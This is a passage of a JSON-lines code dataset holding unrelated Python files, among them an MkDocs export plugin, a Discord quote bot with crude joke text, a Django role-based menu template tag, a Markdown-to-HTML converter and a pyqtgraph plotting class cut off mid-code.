ex,ey,ew,eh in eyes:\n cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(255,0,0),2)\n \"\"\"\n\n var=cv2.waitKey(1)\n if var == ord('q'):\n break\n\n #Saving screenshots for collecting images for dataset\n elif var == ord('p'):\n cv2.imwrite(os.path.join(path,'face{}{}.png'.format('Pranjal',i)),img)\n i=i+1\n elif var == ord('d'):\n cv2.imwrite(os.path.join(path,'face{}{}.png'.format('Diwij',i)),img)\n j=j+1\n cv2.imshow('face',img)\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"Second_Years/Pranjal/OpenCV/Haar_Cascade_Classifier/.ipynb_checkpoints/openCV_Face_detection-checkpoint.py","file_name":"openCV_Face_detection-checkpoint.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"436516763","text":"from mkdocs.plugins import BasePlugin\nimport os\n\nclass MarkdownRenamePlugin(BasePlugin):\n # these are obviously paths\n export_path = os.path.join(os.getcwd(), 'export')\n asset_export_path = os.path.join(export_path, 'edw-assets')\n site_path = os.path.join(os.getcwd(), 'site')\n\n # this dictionary will hold all of the html file names for each Page\n ex = dict()\n\n # make the export_path if it doesn't already exist\n if not os.path.exists(export_path): os.mkdir(os.path.join(export_path))\n \n # Here we are going to take the already built `site_navigation` object and make our own dictionary object with the file names \n # we are going to need for the UDH Documentation Site.\n # The description per MSDOCS own documentation { https://www.mkdocs.org/user-guide/plugins/#on_nav } states as follows:\n # \"The `nav` event is called after the site navigation is created and can be used to alter the site navigation.\"\n def on_nav(self, site_navigation, config):\n print('\\nbuilding file list'.upper())\n self.ex = { \n nav.title: 'index.html' if nav.url.strip('/').split('/')[-1] == '.' else '{}.html'.format(nav.url.strip('/').split('/')[-1]) \n for nav in site_navigation \n }\n print('... file list built successfully')\n return site_navigation\n\n # We only call this event because it happens before any of the page content is handled and the 'page content handling'\n # is where most of our manipulation occurs. I only wanted the message \"begin export\" to fire once before we start exporting\n # so I put it here.\n # A full description of this event can be found at https://www.mkdocs.org/user-guide/plugins/#on_post_template\n # in case we want to use it for something a little more worthy of its existence later.\n def on_post_template(self, output_content, template_name, config):\n print('\\nbegin exporting'.upper())\n print('\\ncontent ---')\n return output_content\n\n # Here is where the bulk of the 'magic' happens.\n # For each file, the event is called for every file that is rendered, we take its contents and put it in to the file \n # that will be exported.\n # The description per MSDOCS own documentation { https://www.mkdocs.org/user-guide/plugins/#on_post_page } states as follows: \n # \"The `post_template` [sic] event is called after the template is rendered, but before it is written to disc and can be used \n # to alter the output of the page. If an empty string is returned, the page is skipped and nothing is written to disc.\"\"\n def on_post_page(self, site_navigation, page, config):\n filename = self.ex[page.title]\n export_fullpath = os.path.join(self.export_path, filename) \n # do the actual thing\n with open(os.path.join(export_fullpath), \"w\") as f:\n f.write(site_navigation)\n print('... {} exported successfully'.format(filename))\n\n # return the content for the real mkdocs functionality \n return site_navigation\n\n def on_post_build(self, config):\n # at the time of this writing we already know the structure of the file tree and that there is only \n # one child directotry in any of the folders we are looping through.\n # a better and more general solution would be to turn this entire routine in a recursively called function \n # but this will do, for now\n print('\\nassets ---')\n # first things first, check if the exports folder for assets exists and if not make it\n if not os.path.exists(self.asset_export_path): os.mkdir(self.asset_export_path)\n for pth in config['assetpaths']:\n # is it a directory? \n for n in os.listdir(os.path.join(self.site_path, pth)):\n # it is? then loop through all of its children\n # are any of these directories? \n if os.path.isdir(os.path.join(self.site_path, pth, n)):\n # found one? then make it's exports folder equivalent folder then loop through and get the files. \n if not os.path.exists(os.path.join(self.asset_export_path, n)): os.mkdir(os.path.join(self.asset_export_path, n))\n # now lets actually cycle through and copy files from the origin { site_path/pth/n } \n # to their new, if temporary, home { asset_export_path/n/f }\n for f in os.listdir(os.path.join(self.site_path, pth, n)):\n content = self.get_asset_file(os.path.join(pth, n, f))\n if content is not None:\n filename = os.path.join(self.asset_export_path, n, f)\n with open(filename, \"w\") as w:\n w.write(content)\n print('... {} exported successfully'.format(os.path.join(pth, n, f)))\n else:\n # it's not? then just put the file where it needs to go\n content = self.get_asset_file(os.path.join(pth, n))\n if content is not None:\n filename = os.path.join(self.asset_export_path, n)\n with open(filename, \"w\") as w:\n w.write(content)\n print('... {} exported successfully'.format(os.path.join(pth, n)))\n\n # this is just a helper function that gets the content for the file path provided. \n def get_asset_file(self, _pth):\n filename = os.path.join(self.site_path, _pth)\n if os.path.exists(filename):\n with open(filename, \"r\") as f:\n return f.read()\n else:\n print('Unable to locate the file {}'.format(filename))\n return None","sub_path":"mkdocs-mkrename-plugin/mkrename/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":5301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"261570869","text":"import webapp2, json, sys, views\nfrom google.appengine.ext import ndb\nfrom google.appengine.datastore.datastore_query import Cursor\nsys.path.insert(0,'libs')\nimport models\n\n\nclass MusicianHandler(views.Template):\n\tdef get(self):\n\t\tuser = self.user_check()\n\t\tmusician = ndb.Key(urlsafe = self.request.get('id')).get()\n\n\t\tif user:\n\t\t\tif musician.user_key == user.key: \n\t\t\t\thide_follow = True \n\t\t\t\tuser_following = False\n\n\t\t\telse:\n\t\t\t\thide_follow = False\n\t\t\t\tuser_following = models.following.Following.get_by_keys(self.user_check().key, musician.key)\n\t\telse:\n\t\t\tuser_following = False\n\t\t\thide_follow = True\n\n\t\t#query all videos for this artist\n\t\tvideos = models.videos.Videos.fetch_by_musician(musician.key)\n\n\t\t#count of musicians by state\n\t\ttotal_musicians = models.musician.Musician.count_by_state(musician.musician_state)\n\t\t\t\n\n\t\t\n\t\ttemplate_values = {'hide':hide_follow,\n\t\t\t\t\t\t 'musician':musician, \n\t\t\t\t\t\t 'videos':videos, \n\t\t\t\t\t\t 'call_b':str(self.request.path), \n\t\t\t\t\t\t 'is_following':user_following,\n\t\t\t\t\t\t 'state_count':total_musicians}\n\t\t\t\t\t\t \n\t\tself.render('musician.html', template_values)\n \t\t \t\t \t\t\napp = webapp2.WSGIApplication([\n \n ('/musician*', MusicianHandler)\n \n], debug=True)\n\n\n","sub_path":"musician.py","file_name":"musician.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"376954377","text":"import discord\nfrom discord.ext import commands\nimport random\nimport config\nimport quotes\nimport asyncio\nfrom discord.ext.commands import cooldown\nimport string\n \nprint(' _ __ _ ____ _ ')\nprint(' | |/ /___| |_ ___ | __ ) ___ | |_ ')\nprint(' | . // _ \\ __/ _ \\| _ \\ / _ \\| __|')\nprint(' | . \\ __/ || (_) | |_) | (_) | |_ ')\nprint(' |_|\\_\\___|\\__\\___/|____/ \\___/ \\__|')\nprint(' ')\n \nbot = commands.Bot(command_prefix=config.prefix)\nbot.remove_command(\"help\")\n \n@bot.event\nasync def on_ready():\n await bot.change_presence(activity=discord.Game(name=\";help | Keylogging Keto\"))\n print('------')\n print('Ready!')\n print('------')\n print('Logged in as:')\n print(bot.user.name)\n print('------')\n print('Connected to:')\n for server in bot.guilds:\n print(' ')\n print(server.name)\n print(server.id)\n print('------')\n print('© Toilet Cat Technologies')\n print('------')\n \nasync def self_check(ctx):\n if 637090083144728576 == ctx.message.author.id:\n return True\n else:\n await ctx.send(f\"<@{ctx.author.id}> is not in the sudoers file. This incident will be reported.\")\n# A secondary check to ensure nobody but the owner can run these commands.\n\n@bot.command()\nasync def help(ctx):\n embed=discord.Embed(title=\"Gordo Quotes\", url=\"https://toilet.cat/\", description=\"Quoting bitches since 2019.\")\n embed.set_thumbnail(url=\"https://raw.githubusercontent.com/xstecky/xstecky.github.io/master/toilet_cat.gif\")\n embed.add_field(name=\"Prefix\", value=\"``;``\", inline=False)\n embed.add_field(name=\"Quotes\", value=\"``ketoquote`` ``humanquote`` ``gaynasaquote`` ``gordoquote`` ``ramsquote``\", inline=False)\n embed.add_field(name=\"Fun\", value=\"``m8b`` ``gordoalt``\", inline=True)\n embed.add_field(name=\"Info\", value=\"``github``\", inline=True)\n embed.add_field(name=\"Other\", value=\"``say`` ``changegame``\", inline=True)\n embed.set_footer(text=\"© Toilet Cat Technologies\")\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} requested the help embed in {ctx.guild.name}!\")\n\n@bot.command()\nasync def m8b(ctx):\n messages = [\"Yes.\", \"No.\", \"Ask Gordo.\", \"Absolutely.\", \"Fuck no.\", \"Yes – definitely.\", \"Bruh. Really?\", \"Star Keto Bot on GitHub, then I'll answer.\", \"Error 523: Can't reach toilet.cat/8banswers.json\", \"Don't count on it.\", \"I need a Juul hit before I can give an accurate answer.\"]\n m8b = (ctx.message.content)\n embed=discord.Embed(title=\"Magic 8-Ball\")\n embed.set_thumbnail(url=\"https://raw.githubusercontent.com/xstecky/Keto-Bot/master/8ballgordo.png\")\n embed.add_field(name=\"Question:\", value=(m8b.replace(';m8b','')), inline=False)\n embed.add_field(name=\"Answer:\", value=(random.choice(messages)), inline=False)\n embed.set_footer(text=\"Asked by {}\".format(ctx.message.author.name))\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} used the magic 8-Ball in {ctx.guild.name}! ({ctx.message.content})\")\n\n@commands.check(self_check)\n@bot.command()\nasync def say(ctx, *, text):\n await ctx.send(text)\n print (f\"{ctx.message.author.name} used the say command in {ctx.guild.name}! ({ctx.message.content})\")\n\n@bot.command()\nasync def github(ctx):\n await ctx.send('https://github.com/xstecky/Keto-Bot')\n print (f\"{ctx.message.author.name} requested the GitHub URL in {ctx.guild.name}!\")\n\n@commands.check(self_check)\n@bot.command()\nasync def changegame(ctx, *, text):\n await bot.change_presence(activity=discord.Game(name=(text)))\n await ctx.send('done :zany_face:')\n print (f\"{ctx.message.author.name} changed Keto's status in {ctx.guild.name}! ({ctx.message.content})\")\n\n@commands.check(self_check)\n@bot.command()\nasync def debug(ctx):\n await ctx.send('fuck <@643943061893808148> :rage:')\n print (f\"{ctx.message.author.name} debugged in {ctx.guild.name}!\")\n\n@bot.command()\nasync def ketoquote(ctx):\n messages = quotes.keto\n embed=discord.Embed(title=\"\", description=random.choice(messages))\n embed.set_footer(text=\"Keto requested by {}\".format(ctx.message.author.name))\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} requested a Keto quote in {ctx.guild.name}!\")\n\n@bot.command()\nasync def humanquote(ctx):\n messages = quotes.human\n embed=discord.Embed(title=\"\", description=random.choice(messages))\n embed.set_footer(text=\"Human requested by {}\".format(ctx.message.author.name))\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} requested a Human quote in {ctx.guild.name}!\")\n\n@bot.command()\nasync def gaynasaquote(ctx):\n messages = quotes.gaynasa\n embed=discord.Embed(title=\"\", description=random.choice(messages))\n embed.set_footer(text=\"Gay Nasa requested by {}\".format(ctx.message.author.name))\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} requested a Gay Nasa quote in {ctx.guild.name}!\")\n\n@bot.command()\nasync def gordoquote(ctx):\n messages = quotes.gordo\n embed=discord.Embed(title=\"\", description=random.choice(messages))\n embed.set_footer(text=\"Gordo requested by {}\".format(ctx.message.author.name))\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} requested a Gordo quote in {ctx.guild.name}!\")\n\n@bot.command()\nasync def ramsquote(ctx):\n messages = quotes.rams\n embed=discord.Embed(title=\"\", description=random.choice(messages))\n embed.set_footer(text=\"Dieter Rams requested by {}\".format(ctx.message.author.name))\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} requested a Dieter Rams quote in {ctx.guild.name}!\")\n\n@bot.command()\n@cooldown(1, 16) # 1000 second cooldown\nasync def gordoalt(ctx):\n message = await ctx.send('SCANNING FOR GORDO ALTS...')\n await message.edit(content='SCANNING FOR GORDO ALTS...')\n await asyncio.sleep(2)\n await message.edit(content='10% [▰▱▱▱▱▱▱▱▱▱]')\n await asyncio.sleep(0.5)\n await message.edit(content='20% [▰▰▱▱▱▱▱▱▱▱]')\n await asyncio.sleep(0.5)\n await message.edit(content='30% [▰▰▰▱▱▱▱▱▱▱]')\n await asyncio.sleep(1)\n await message.edit(content='40% [▰▰▰▰▱▱▱▱▱▱]')\n await asyncio.sleep(2)\n await message.edit(content='50% [▰▰▰▰▰▱▱▱▱▱]')\n await asyncio.sleep(1)\n await message.edit(content='60% [▰▰▰▰▰▰▱▱▱▱]')\n await asyncio.sleep(0.5)\n await message.edit(content='70% [▰▰▰▰▰▰▰▱▱▱]')\n await asyncio.sleep(0.5)\n await message.edit(content='80% [▰▰▰▰▰▰▰▰▱▱]')\n await asyncio.sleep(1)\n await message.edit(content='90% [▰▰▰▰▰▰▰▰▰▱]')\n await asyncio.sleep(2)\n await message.edit(content='100% [▰▰▰▰▰▰▰▰▰▰]')\n await asyncio.sleep(2)\n defaultmembers = 0\n for member in ctx.guild.members:\n if member.avatar == None:\n defaultmembers += 1\n complete = [\"ATTENTION ALL ADMINS: GORDO ALT IN GENERAL!\"]\n if defaultmembers == 0:\n complete.append(f\"{len(ctx.guild.members)} MEMBERS SCANNED, NO GORDO ALTS FOUND\")\n elif defaultmembers == 1:\n complete.append(f\"{len(ctx.guild.members)} MEMBERS SCANNED, {defaultmembers} GORDO ALT FOUND\")\n else:\n complete.append(f\"{len(ctx.guild.members)} MEMBERS SCANNED, {defaultmembers} GORDO ALTS FOUND\")\n await message.edit(content=random.choice(complete))\n\nimport config\nbot.run(config.token, bot=True)\n","sub_path":"keto.py","file_name":"keto.py","file_ext":"py","file_size_in_byte":7471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80774474","text":"\"\"\"\n east.helpers\n ============\n Various helper functions and data structures\n\n :copyright: (c) 2016 by Zvonimir Jurelinac\n :license: MIT\n\"\"\"\n\nimport mistune\n\nfrom collections import OrderedDict\nfrom datetime import date, datetime\n\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.formatters import html\n\n\n# Data serialization functions\n\ndef serialize(obj, *args):\n \"\"\"Serialize an object for future JSON encoding\"\"\"\n value = obj(*args) if callable(obj) else obj\n return value.isoformat() if isinstance(value, (date, datetime)) else value\n\n\ndef to_jsondict(obj, view=''):\n \"\"\"Convert Python object to JSON-encodable dictionary\"\"\"\n return obj.to_jsondict(view) if hasattr(obj, 'to_jsondict') else obj\n\n\ndef to_jsontype(type):\n \"\"\"Convert Python type names to Javascript/JSON equivalents\"\"\"\n typename = type.__name__ if type else None\n renames = {'str': 'string', 'int': 'integer', 'bool': 'bool'}\n if typename in renames:\n typename = renames[typename]\n return typename\n\n\n# Meta functions\n\ndef clear_json_quotes(json_data):\n \"\"\"Remove quotes surrounding types from JSON response documentation\"\"\"\n lines = []\n for line in json_data.splitlines():\n if ':' in line:\n key, value = line.split(':', maxsplit=1)\n value = value.strip()\n lines.append(key + ': ' + value.strip('\",') + (',' if value.endswith(',') else ''))\n else:\n lines.append(' ' * (len(line) - len(line.lstrip(' '))) + line.strip('\" '))\n return '\\n'.join(lines)\n\n\ndef get_class_plural_name(cls):\n \"\"\"Convert class name to it's plural form\"\"\"\n base = cls.__name__.lower()\n for ending in ('s', 'z', 'x', 'ch', 'sh'):\n if base.endswith(ending):\n return base + 'es'\n if base.endswith('y'):\n return base[:-1] + 'ies'\n else:\n return base + 's'\n\n\ndef parse_argdict(extras):\n \"\"\"Parse arguments dict - replace all functions by their return values\"\"\"\n return [(key, value() if callable(value) else value) for key, value in extras.items()]\n\n\n# Datastructures\n\n# class OrderedDefaultDict(OrderedDict, defaultdict):\n# def __init__(self, default_factory=None, *args, **kwargs):\n# super().__init__(*args, **kwargs)\n# self.default_factory = default_factory\n\n\nclass OrderedDefaultDict(OrderedDict):\n # Source: http://stackoverflow.com/a/6190500/562769\n def __init__(self, default_factory=None, *a, **kw):\n if (default_factory is not None and not callable(default_factory)):\n raise TypeError('first argument must be callable')\n super().__init__(*a, **kw)\n self.default_factory = default_factory\n\n def __getitem__(self, key):\n try:\n return super().__getitem__(key)\n except KeyError:\n return self.__missing__(key)\n\n def __missing__(self, key):\n if self.default_factory is None:\n raise KeyError(key)\n self[key] = value = self.default_factory()\n return value\n\n def __reduce__(self):\n if self.default_factory is None:\n args = tuple()\n else:\n args = self.default_factory,\n return type(self), args, None, None, self.items()\n\n def copy(self):\n return self.__copy__()\n\n def __copy__(self):\n return type(self)(self.default_factory, self)\n\n def __deepcopy__(self, memo):\n import copy\n return type(self)(self.default_factory,\n copy.deepcopy(self.items()))\n\n def __repr__(self):\n return 'OrderedDefaultDict(%s, %s)' % (self.default_factory,\n super().__repr__())\n\n\nclass EastMarkdownParser:\n \"\"\"\n Custom markdown parser\n\n Supports code highlighting via Pygments and Table of Contents generation\n \"\"\"\n\n def __init__(self):\n\n class EastRenderer(mistune.Renderer):\n\n def __init__(self, create_toc=False):\n self.create_toc = create_toc\n self.toc_list = []\n self.toc_count = -1\n super().__init__()\n\n def block_code(self, code, lang):\n if not lang:\n return '\\n
%s
\\n' % \\\n mistune.escape(code)\n lexer = get_lexer_by_name(lang, stripall=True)\n formatter = html.HtmlFormatter()\n return highlight(code, lexer, formatter)\n\n def header(self, text, level, raw=None):\n if self.create_toc and level == 2:\n self.toc_list.append(text)\n self.toc_count += 1\n return '%s\\n' % (level, self.toc_count, text, level)\n else:\n return '%s\\n' % (level, text, level)\n\n def reset_toc(self):\n self.toc_list = []\n self.toc_count = -1\n\n def toc(self):\n return '\\n'.join(['
  • %s
  • '\n % (i, h) for i, h in enumerate(self.toc_list)])\n\n self.renderer = EastRenderer()\n self.parser = mistune.Markdown(renderer=self.renderer)\n\n def render(self, raw, create_toc=False):\n self.renderer.create_toc = create_toc\n if create_toc:\n self.renderer.reset_toc()\n return self.parser(raw)\n","sub_path":"east/east/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"647772475","text":"# Author: Thomas Vu\r\n# Email: thomas.vu@ucalgary.ca\r\n# Feel free to send any questions about this problem to the email above\r\n# or ask in the CPC discord. (discord.gg/MEXwfze)\r\n\r\nn = int(input())\r\ntemperatures = [int(i) for i in input().split()]\r\ntempsBelowZero = 0\r\nfor temp in temperatures:\r\n if temp < 0:\r\n tempsBelowZero += 1\r\nprint(tempsBelowZero)\r\n\r\n\r\n# Short version:\r\n\r\n# input()\r\n# print(input().count(\"-\"))\r\n","sub_path":"solutions/cold.py","file_name":"cold.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598586756","text":"from __future__ import print_function, unicode_literals\nimport os\nimport string\nimport markdown\nimport codecs\nfrom glob import glob\nfrom shutil import copyfile\nfrom general_tools.file_utils import write_file\nfrom converter import Converter\nfrom door43_tools.obs_handler import OBSInspection\nfrom door43_tools.obs_data import obs_data\n\n\nclass Md2HtmlConverter(Converter):\n\n def convert_obs(self):\n self.logger.info('Processing the OBS markdown files')\n\n # find the first directory that has md files.\n files = self.get_files()\n\n current_dir = os.path.dirname(os.path.realpath(__file__))\n with open(os.path.join(current_dir, 'templates', 'obs-template.html')) as template_file:\n html_template = string.Template(template_file.read())\n\n found_chapters = {}\n\n for filename in files:\n if filename.endswith('.md'):\n # Convert files that are markdown files\n with codecs.open(filename, 'r', 'utf-8-sig') as md_file:\n md = md_file.read()\n html = markdown.markdown(md)\n html = html_template.safe_substitute(content=html)\n base_name = os.path.splitext(os.path.basename(filename))[0]\n found_chapters[base_name] = True\n html_filename = base_name + \".html\"\n output_file = os.path.join(self.output_dir, html_filename)\n write_file(output_file, html)\n self.logger.info('Converted {0} to {1}.'.format(os.path.basename(filename), os.path.basename(html_filename)))\n\n # Do the OBS inspection (this now operates on a single file instead of folder)\n # QUESTION: Should this be done separately after conversion????\n inspector = OBSInspection(output_file, self.logger)\n try:\n inspector.run()\n except Exception as e:\n self.logger.warning('Chapter {0}: failed to run OBS inspector: {1}'.format(base_name, e.message))\n else:\n # Directly copy over files that are not markdown files\n try:\n output_file = os.path.join(self.output_dir, os.path.basename(filename))\n if not os.path.exists(output_file):\n copyfile(filename, output_file)\n except:\n pass\n\n for chapter in sorted(obs_data['chapters']): # verify all expected chapters are present\n found_chapter = found_chapters.get(chapter)\n if not found_chapter:\n self.logger.warning('Chapter {0} is missing!'.format(chapter))\n\n self.logger.info('Finished processing Markdown files.')\n","sub_path":"converters/md2html_converter.py","file_name":"md2html_converter.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179896314","text":"import database\r\n\r\n# # add a record to the database\r\n# database.add_one(\"Pako\", \"Iliev\" , \"pako@pako.es\")\r\n\r\n\r\n\r\n# # delete record row id as string\r\n# database.delete_one('5')\r\n\r\n\r\n# add many records\r\nstuff = [\r\n ('Ceko', 'Sofinq', 'ceko@sifonq.bg'),\r\n ('Tigar', 'Pobesnel', 'tigar@besen.bg')\r\n ]\r\n \r\ndatabase.add_many(stuff)\r\n\r\n\r\n# show all the records\r\ndatabase.show_all()","sub_path":"our_app.py","file_name":"our_app.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"45379346","text":"import os\r\nimport re\r\n\r\nfrom django import template\r\nfrom django.conf import settings\r\nfrom django.utils.safestring import mark_safe\r\n\r\nregister = template.Library()\r\n\r\n\r\ndef get_structure_data(request):\r\n \"\"\"处理菜单结构\"\"\"\r\n menu = request.session[settings.SESSION_MENU_KEY]\r\n all_menu = menu[settings.ALL_MENU_KEY]\r\n permission_url = menu[settings.PERMISSION_MENU_KEY]\r\n\r\n # all_menu = [\r\n # {'id': 1, 'title': '订单管理', 'parent_id': None},\r\n # {'id': 2, 'title': '库存管理', 'parent_id': None},\r\n # {'id': 3, 'title': '生产管理', 'parent_id': None},\r\n # {'id': 4, 'title': '生产调查', 'parent_id': None}\r\n # ]\r\n\r\n # 定制数据结构\r\n all_menu_dict = {}\r\n for item in all_menu:\r\n item['status'] = False\r\n item['open'] = False\r\n item['children'] = []\r\n all_menu_dict[item['id']] = item\r\n\r\n # all_menu_dict = {\r\n # 1: {'id': 1, 'title': '订单管理', 'parent_id': None, 'status': False, 'open': False, 'children': []},\r\n # 2: {'id': 2, 'title': '库存管理', 'parent_id': None, 'status': False, 'open': False, 'children': []},\r\n # 3: {'id': 3, 'title': '生产管理', 'parent_id': None, 'status': False, 'open': False, 'children': []},\r\n # 4: {'id': 4, 'title': '生产调查', 'parent_id': None, 'status': False, 'open': False, 'children': []}\r\n # }\r\n\r\n # permission_url = [\r\n # {'title': '查看订单', 'url': '/order', 'menu_id': 1},\r\n # {'title': '查看库存清单', 'url': '/stock/detail', 'menu_id': 2},\r\n # {'title': '查看生产订单', 'url': '/produce/detail', 'menu_id': 3},\r\n # {'title': '产出管理', 'url': '/survey/produce', 'menu_id': 4},\r\n # {'title': '工时管理', 'url': '/survey/labor', 'menu_id': 4},\r\n # {'title': '入库', 'url': '/stock/in', 'menu_id': 2},\r\n # {'title': '排单', 'url': '/produce/new', 'menu_id': 3}\r\n # ]\r\n\r\n request_rul = request.path_info\r\n\r\n for url in permission_url:\r\n # 添加两个状态:显示 和 展开\r\n url['status'] = True\r\n pattern = url['url']\r\n\r\n if re.match(pattern, request_rul):\r\n url['open'] = True\r\n else:\r\n url['open'] = False\r\n\r\n # 将url添加到菜单下\r\n all_menu_dict[url['menu_id']][\"children\"].append(url)\r\n\r\n # 显示菜单:url 的菜单及上层菜单 status: true\r\n pid = url['menu_id']\r\n while pid:\r\n all_menu_dict[pid]['status'] = True\r\n pid = all_menu_dict[pid]['parent_id']\r\n\r\n # 展开url上层菜单:url['open'] = True, 其菜单及其父菜单open = True\r\n if url['open']:\r\n ppid = url['menu_id']\r\n while ppid:\r\n all_menu_dict[ppid]['open'] = True\r\n ppid = all_menu_dict[ppid]['parent_id']\r\n\r\n # 整理菜单层级结构:没有parent_id 的为根菜单, 并将有parent_id 的菜单项加入其父项的chidren内\r\n menu_data = []\r\n for i in all_menu_dict:\r\n if all_menu_dict[i]['parent_id']:\r\n pid = all_menu_dict[i]['parent_id']\r\n parent_menu = all_menu_dict[pid]\r\n parent_menu['children'].append(all_menu_dict[i])\r\n else:\r\n menu_data.append(all_menu_dict[i])\r\n\r\n return menu_data\r\n\r\n\r\ndef get_menu_html(menu_data):\r\n \"\"\"显示:菜单 + [子菜单] + 权限(url)\"\"\"\r\n # option_str = \"\"\"\r\n #
    \r\n #
    {menu_title}
    \r\n #
    {sub_menu}
    \r\n #
    \r\n # \"\"\"\r\n #\r\n # url_str = \"\"\"\r\n # {permission_title}\r\n # \"\"\"\r\n\r\n list_title_blank = ['库存导入'] # 需新窗口打开的title\r\n\r\n option_str = \"\"\"\r\n
  • \r\n \r\n \r\n {menu_title}\r\n \r\n \r\n\r\n
      \r\n {sub_menu} \r\n
    \r\n\t\t\t
  • \r\n \"\"\"\r\n\r\n url_str = \"\"\"\r\n
  • \r\n \r\n \r\n {permission_title}\r\n \r\n
  • \r\n \"\"\"\r\n\r\n url_str_blank = \"\"\"\r\n
  • \r\n \r\n \r\n {permission_title}\r\n \r\n
  • \r\n \"\"\"\r\n\r\n menu_html = ''\r\n for item in menu_data:\r\n if not item['status']: # 如果用户权限不在某个菜单下,即item['status']=False, 不显示\r\n continue\r\n else:\r\n if item.get('url'): # 说明循环到了菜单最里层的url\r\n if item['title'] in list_title_blank:\r\n menu_html += url_str_blank.format(permission_url=item['url'],\r\n permission_title=item['title'])\r\n else:\r\n menu_html += url_str.format(permission_url=item['url'],\r\n permission_title=item['title'])\r\n else:\r\n menu_html += option_str.format(menu_title=item['title'],\r\n sub_menu=get_menu_html(item['children']))\r\n\r\n return menu_html\r\n\r\n\r\n@register.simple_tag\r\ndef rbac_menu(request):\r\n \"\"\"\r\n 显示多级菜单:\r\n 请求过来 -- 拿到session中的菜单,权限数据 -- 处理数据 -- 作显示\r\n 数据处理部分抽象出来由单独的函数处理;渲染部分也抽象出来由单独函数处理\r\n \"\"\"\r\n menu_data = get_structure_data(request)\r\n menu_html = get_menu_html(menu_data)\r\n\r\n # 因为标签无法使用safe过滤器,这里用mark_safe函数来实现\r\n # print(menu_html)\r\n return mark_safe(menu_html)\r\n","sub_path":"rbac/templatetags/custom_tag.py","file_name":"custom_tag.py","file_ext":"py","file_size_in_byte":6321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"401609860","text":"# Choice Plot --------------------------------------------------------\nimport pyqtgraph as pg\nimport numpy as np\nfrom config.gui_settings import choice_history_len,choice_plot_window,choice_plot_look_ahead\nfrom PyQt5.QtCore import Qt\n\nclass Sequence_Plot():\n def __init__(self, parent_plot, data_len=100):\n self.plot_widget = parent_plot\n correct_color = pg.mkColor(0,255,0) # green\n correct_no_liquid_color = pg.mkColor(0,255,0,80) # faded green\n incorrect_color = pg.mkColor(0,0,0) # black\n background_color = pg.mkColor(255,255,0) # yellow\n background_no_liquid_color = pg.mkColor(255,255,0,128) # faded yellow\n faulty_color = pg.mkColor(255,0,0) # red\n self.my_colors = (correct_color, incorrect_color,background_color,faulty_color,correct_no_liquid_color,background_no_liquid_color)\n self.my_symbols = ('o','+','s','t') # circle, plus, square,triangle\n self.is_active = False\n self.do_update = True\n self.data_len = choice_history_len\n self.new_bout_line = pg.InfiniteLine(angle=90,pen='#FF1FE6')\n self.bout_text = pg.TextItem(\"testing\", anchor=(0, .5))\n self.faulty_line = None\n self.faulty_drawn_in_center = False\n self.bout_info_ylocation = 4\n\n def set_state_machine(self,sm_info):\n if not self.is_active: return\n self.setup_plot_widget()\n \n def setup_plot_widget(self):\n self.last_choice = ''\n self.reward_seq = ''\n self.label_new_bout = False\n self.next_seq = ''\n self.bout_start_trial = 0\n self.next_block_start = 0\n\n self.rewarded_trials = 0\n \n self.plot_widget.hideAxis('right')\n self.plot_widget.showAxis('left')\n self.plot_widget.setRange(xRange=[-1,choice_plot_window+choice_plot_look_ahead], padding=0)\n self.plot_widget.setMouseEnabled(x=True,y=False)\n self.plot_widget.showGrid(x=True,alpha=0.75)\n self.plot_widget.setLimits(xMin=-1)\n\n self.plot_widget.clear()\n self.plot_widget.getAxis('bottom').setLabel('Rat Perceived Trial')\n self.plot_widget.getAxis('right').setWidth(75)\n self.plot_widget.getAxis('left').setWidth(50)\n\n self.plot_widget.setYRange(4,9, padding=0.1)\n self.plot = self.plot_widget.plot(pen=None, symbol='o', symbolSize=6, symbolPen=None)\n\n self.plot_widget.setTitle('Choices and Outcomes')\n self.plot_widget.getAxis('left').setTicks([[(7,'Left'),(6,'Right')]])\n\n def run_start(self):\n if not self.is_active: return\n self.plot.clear()\n self.trial_num = 0\n self.data = np.zeros([self.data_len,6])\n self.plot_widget.addItem(self.bout_text)\n self.plot_widget.addItem(self.new_bout_line)\n\n def process_data(self, new_data):\n if not self.is_active: return\n '''Store new data from board.'''\n faulty_msgs = [nd for nd in new_data if nd[0] == 'P' and nd[2].split(',')[0]=='faulty'] \n outcome_msgs = [nd for nd in new_data if nd[0] == 'P' and nd[2].split(',')[0]=='rslt'] \n new_block_msgs = [nd for nd in new_data if nd[0] == 'P' and nd[2].split(',')[0]=='NB']\n newBlock_var_update_msgs = [nd for nd in new_data if nd[0] == 'V' and nd[2].split(' ')[0].find('trials_until_change')>-1] \n if outcome_msgs:\n n_new = len(outcome_msgs)\n self.data = np.roll(self.data, -n_new, axis=0)\n for i, 